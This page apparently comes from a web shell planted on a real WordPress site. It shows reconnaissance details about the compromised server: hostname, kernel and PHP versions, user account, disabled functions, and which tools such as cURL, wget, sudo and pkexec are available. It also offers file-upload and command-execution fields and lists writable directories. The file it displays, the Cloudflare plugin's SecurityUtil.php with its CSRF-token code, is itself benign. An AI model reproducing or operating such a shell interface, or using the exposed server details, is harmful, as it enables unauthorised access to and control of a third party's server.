403Webshell
Server IP : www.new.bangkokfinder.com  /  Your IP : 172.70.93.80
Web Server : nginx/1.20.1
System : Linux new 4.15.0-159-generic #167-Ubuntu SMP Tue Sep 21 08:55:05 UTC 2021 x86_64
User : bangkokfinder ( 1000)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bangkokfinder/www/wp-content/plugins/cloudflare/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/bangkokfinder/www/wp-content/plugins/cloudflare/src/SecurityUtil.php
<?php

namespace Cloudflare\APO;

class SecurityUtil
{
    /**
     * @return bool|string
     */
    public static function generate16bytesOfSecureRandomData()
    {
        if (function_exists('random_bytes')) {
            $randBytes = random_bytes(16);
        } elseif (function_exists('openssl_random_pseudo_bytes')) {
            $wasItSecure = false;
            $randBytes = openssl_random_pseudo_bytes(16, $wasItSecure);
            if ($wasItSecure === false) {
                return false;
            }
        } else {
            return false;
        }

        return bin2hex($randBytes);
    }

    /**
     * @param $secret - string a cryptographically strong secret
     * @param $user - string a piece of unique user data
     * @param $timeValidUntil - int of time the token will be valid for in seconds
     *
     * @return string
     */
    public static function csrfTokenGenerate($secret, $user, $timeValidUntil = null)
    {
        if ($timeValidUntil === null) {
            $timeValidUntil = time() + 86400;
        }
        $hashedSecret = hash('sha512', $secret);
        $dataToHash = sprintf('%s-%s-%s', $hashedSecret, $user, $timeValidUntil);
        $hashedData = static::hashFunction($dataToHash);

        return sprintf('%s-%s', $timeValidUntil, $hashedData);
    }

    /**
     * @param $secret - string a cryptographically strong secret
     * @param $user - string a piece of unique user data
     * @param $token- string the token that needs to be validated.
     *
     * @return bool
     */
    public static function csrfTokenValidate($secret, $user, $token)
    {
        $tokenParts = explode('-', $token);
        if (count($tokenParts) !== 2) {
            return false;
        }

        list($timeValidFor, $hash) = $tokenParts;

        $hashedSecret = hash('sha512', $secret);
        $dataToHash = sprintf('%s-%s-%s', $hashedSecret, $user, $timeValidFor);
        $newHash = static::hashFunction($dataToHash);
        if ($newHash !== $hash) {
            return false;
        }
        if (time() > $timeValidFor) {
            return false;
        }

        return true;
    }

    /**
     * @param $data - string the data that will be hashed.
     *
     * @return string
     */
    private static function hashFunction($data)
    {
        $hash = hash('sha512', $data);

        return substr($hash, 64);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit